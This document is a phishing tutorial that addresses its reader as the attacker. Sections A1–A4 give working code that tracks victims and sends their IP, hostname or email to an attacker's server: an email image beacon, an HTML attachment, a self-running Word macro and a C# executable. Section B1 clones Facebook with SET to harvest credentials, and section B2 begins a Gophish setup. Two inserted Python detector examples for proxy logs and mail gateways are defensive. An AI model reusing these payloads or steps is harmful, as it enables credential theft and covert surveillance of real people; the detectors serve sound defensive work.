
Update on 20190527
Creating Look-Alike Domain Names Using CATPHISH or DNSTWIST
You can find CATPHISH at: https://github.com/ring0lab/catphish
You can find DNSTWIST at: https://github.com/elceef/dnstwist
A1. Phishing through Emails
Manually create an email template using HTML.
Embed the following HTML code to monitor the victim’s activity when they open the email and allow images to load:
Create the files ‘tracker.php’ and ‘log.txt’ in your web server’s document root directory (for instance, /var/www/html).
Insert the following PHP code into ‘tracker.php’.
```php
<?php
$logFile = fopen("log.txt", "a");
if(isset($_GET["email"])){
    $logMessage = $_GET["email"] . " opened the mail at ". date("Y/m/d h:i:sa") . ".\r\n";
}
fwrite($logFile, $logMessage);
fclose($logFile);
?>
```
Open ‘log.txt’ to view a list of email addresses that have attempted to open your phishing email.
A2. Phishing through HTML Attachments
Create an HTML file named ‘promotion.html’ containing the following code:
```javascript
var xhr = new XMLHttpRequest();
xhr.open('GET', "http://ipinfo.io/json", true);
xhr.send();
xhr.addEventListener("readystatechange", processRequest, false);
var ip = "";

function processRequest(e) {
    if (xhr.readyState == 4 && xhr.status == 200) {
        var response = JSON.parse(xhr.responseText);
        ip = response.ip;
        country = response.country;
    }
    var log = "[" + Date() + "] " + ip + " from " + country + " accessed to " + "" + " (" + window.location.href + ") with HTML attachment.\r\n";
    new Image().src = 'http://<server_ip>/tracker.php?attachment=' + log;
}
```
Modify the ‘tracker.php’ file created in section A1 by adding the following code:
```php
if(isset($_GET["attachment"])){
    $logMessage = $_GET["attachment"];
}
```
Send an email to the victim, attaching the ‘promotion.html’ file.
Open the ‘log.txt’ file to identify individuals who have opened the HTML attachment.
A3. Phishing through VBA in Attachments
Create a new document named ‘promotion.docm’ and open it.
Open the Macros window by pressing Alt + F9 and create a macro named ‘AutoExec’.
Paste the following code into the macro:
```vb
Sub AutoExec()
    Dim MyRequest As Object
    Set MyRequest = CreateObject("WinHttp.WinHttpRequest.5.1")
    Dim DateTime As String
    Dim IPAddress As String
    Dim Hostname As String
    Dim Log As String

    DateTime = Now
    IPAddress = GetIPAddress()
    Hostname = Environ("computername")
    Log = "[" + DateTime + "] Accessed to " + IPAddress + "(" + Hostname + ")" + " with attachment."
    ' MsgBox Log

    MyRequest.Open "GET", _
        "http://<server_ip>/tracker.php?attachment=" + Log

    ' Send Request.
    MyRequest.Send
    ' MsgBox IPAddress + "accessed by " + Hostname
End Sub

Function GetIPAddress()
    Const strComputer As String = "." ' Computer name. Dot means local computer
    Dim objWMIService, IPConfigSet, IPConfig, IPAddress, i
    Dim strIPAddress As String

    ' Connect to the WMI service
    Set objWMIService = GetObject("winmgmts:" _
        & "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2")

    ' Get all TCP/IP-enabled network adapters
    Set IPConfigSet = objWMIService.ExecQuery _
        ("Select * from Win32_NetworkAdapterConfiguration Where IPEnabled=TRUE")

    ' Get all IP addresses associated with these adapters
    For Each IPConfig In IPConfigSet
        IPAddress = IPConfig.IPAddress
        If Not IsNull(IPAddress) Then
            strIPAddress = strIPAddress & Join(IPAddress, ", ")
        End If
    Next

    GetIPAddress = strIPAddress
End Function
```
Send the document as an attachment to the victim and then review the ‘log.txt’ file.
A4. Phishing through Executable File Attachments
Create a new Console App (.Net Framework) project in Microsoft Visual Studio.
Replace the code in ‘Program.cs’ with the following code:
```csharp
using System;
using System.Net;
using System.Globalization;

namespace TrackMe
{
    class Program
    {
        static void Main(string[] args)
        {
            DateTime localDate = DateTime.Now;
            var culture = new CultureInfo("en-US");
            string datetime = localDate.ToString(culture);
            IPHostEntry host;
            string localIP = "";
            string hostname = Dns.GetHostName();
            host = Dns.GetHostEntry(hostname);

            //To retrieve IP Addresses
            foreach (IPAddress ip in host.AddressList)
            {
                if (ip.AddressFamily.ToString() == "InterNetwork")
                {
                    localIP = ip.ToString();
                }
            }

            String log = $"[{datetime}] Accessed to {localIP} ({hostname}) with attachment.";

            //To send the logs to receiver
            var client = new WebClient();
            var content = client.DownloadString($"http://<server_ip>/tracker.php?attachment={log}");
        }
    }
}
```
Build the project to generate the executable (.exe) file and send this file as an attachment to the victim.
Examine the ‘log.txt’ file for any recorded activity.
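Seen from the egress proxy, the beacons in A1 to A4 share one trait: a GET request whose query string carries the recipient's email address or the workstation's internal IP and hostname. The following detector is an added example, not code from the original page; the log layout, the sample lines and the hostname `WS-FIN-07` are constructed for illustration.

```python
import ipaddress
import re
from urllib.parse import urlsplit, parse_qsl

EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")

def has_internal_ip(text):
    """True if text contains a private, loopback or link-local IPv4 address."""
    for token in IPV4_RE.findall(text):
        try:
            if ipaddress.ip_address(token).is_private:
                return True
        except ValueError:  # not a valid address, e.g. 999.1.1.1
            continue
    return False

def inspect_url(url, hostnames=()):
    """Return the reasons a requested URL looks like an A1-A4 style beacon."""
    parts, reasons = urlsplit(url), []
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if EMAIL_RE.search(value):
            reasons.append(f"{name}: email address")
        if has_internal_ip(value):
            reasons.append(f"{name}: internal IP")
        if any(h.lower() in value.lower() for h in hostnames):
            reasons.append(f"{name}: internal hostname")
    if reasons and parts.scheme == "http":
        reasons.append("cleartext HTTP")
    return reasons

def scan(log_text, hostnames=()):
    """List (client, reasons) for each suspicious 'ts client method url' line."""
    hits = []
    for line in filter(None, map(str.strip, log_text.splitlines())):
        _ts, client, _method, url = line.split(maxsplit=3)
        if reasons := inspect_url(url, hostnames):
            hits.append((client, reasons))
    return hits

# Constructed proxy log lines: timestamp, client, method, URL.
SAMPLE_LOG = """
2019-05-27T09:14:02Z 10.1.4.22 GET http://203.0.113.10/tracker.php?email=alice%40corp.example
2019-05-27T09:15:40Z 10.1.4.37 GET http://203.0.113.10/tracker.php?attachment=Accessed%20to%2010.1.4.37%20(WS-FIN-07)%20with%20attachment.
2019-05-27T09:16:11Z 10.1.4.22 GET https://www.example.org/search?q=quarterly+report
"""

if __name__ == "__main__":
    print(*scan(SAMPLE_LOG, hostnames=("WS-FIN-07",)), sep="\n")
```

Feeding `hostnames` from the asset inventory turns the hostname check into a general test for internal names leaving the network in URLs.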
A5. Phishing through HTA File Attachments
Obfuscated version:
https://www.cleancss.com/javascript-obfuscate/index.php
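On the receiving side, the delivery methods in A1 to A5 leave two things a mail gateway can check before delivery: a remote image whose URL contains the recipient's own address, and an attachment of type .html, .docm, .exe or .hta. The following inspection routine is an added example, not code from the original page; the sample message and its addresses are constructed.

```python
from email import message_from_string
from email.utils import getaddresses
from html.parser import HTMLParser
from urllib.parse import unquote

# Attachment types used for delivery in sections A2-A5 of this page.
RISKY_EXT = (".html", ".htm", ".docm", ".exe", ".hta")

class ImgCollector(HTMLParser):
    """Collect the src of every remotely loaded <img> tag."""
    def __init__(self):
        super().__init__()
        self.sources = []
    def handle_starttag(self, tag, attrs):
        src = dict(attrs).get("src") or ""
        if tag == "img" and src.lower().startswith(("http://", "https://")):
            self.sources.append(src)

def inspect_message(raw):
    """Return (finding, detail) pairs for one RFC 5322 message string."""
    msg = message_from_string(raw)
    rcpts = [a.lower() for _, a in getaddresses(msg.get_all("To", [])) if a]
    findings = []
    for part in msg.walk():
        name = part.get_filename()
        if name and name.lower().endswith(RISKY_EXT):
            findings.append(("risky-attachment", name))
        elif part.get_content_type() == "text/html" and not name:
            body = part.get_payload(decode=True).decode("utf-8", "replace")
            collector = ImgCollector()
            collector.feed(body)
            for src in collector.sources:
                if any(r in unquote(src).lower() for r in rcpts):
                    findings.append(("recipient-in-image-url", src))
    return findings

# Constructed sample message (not from the page).
SAMPLE = (
    "To: Alice <alice@corp.example>\nMIME-Version: 1.0\n"
    'Content-Type: multipart/mixed; boundary="b1"\n\n'
    '--b1\nContent-Type: text/html; charset="utf-8"\n\n'
    '<img src="http://203.0.113.10/tracker.php?email=alice%40corp.example">\n'
    '--b1\nContent-Type: application/octet-stream\n'
    'Content-Disposition: attachment; filename="promotion.docm"\n'
    "Content-Transfer-Encoding: base64\n\nY29uc3RydWN0ZWQ=\n--b1--\n"
)

if __name__ == "__main__":
    print(inspect_message(SAMPLE))
```

The image check only catches identifiers sent in the clear; a hashed or opaque per-recipient token needs a different signal, such as the same image URL differing only in one parameter across recipients.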
B1. Phishing with the Social Engineering Toolkit (SET)
Download the Social Engineering Toolkit (SET) from: https://github.com/trustedsec/social-engineer-toolkit
Run the ‘setoolkit’ script and navigate through the following options:
- Social-Engineering Attacks
- Website Attack Vectors
- Credential Harvester Attack Method
- Site Cloner
```
root@kali:~/Downloads/social-engineer-toolkit-master# python setoolkit
set> 1
set> 2
set:webattack>3
set:webattack>2
```
Input your server’s IP address and the website address you want to clone.
```
set:webattack> IP address for the POST back in Harvester/Tabnabbing [192.168.231.129]:192.168.231.129
set:webattack> Enter the url to clone:https://www.facebook.com
```
Wait for a victim to click the link within your phishing email and submit their credentials on the cloned page.
Observe the output on your terminal for captured credentials.
After completing your phishing campaign, generate a report of the captured data.
B2. Phishing with Gophish
Download the Gophish phishing framework from: https://getgophish.com.
Open the ‘gophish.exe’ file to launch the application.
Open your web browser and go to this address: https://127.0.0.1:3333/login to access the Gophish login page. Use the default credentials (admin:gophish) to log in.
B2.1 Configuring a Sending Profile
B2.2 Creating an Email Template
B2.3 Importing a Landing Page



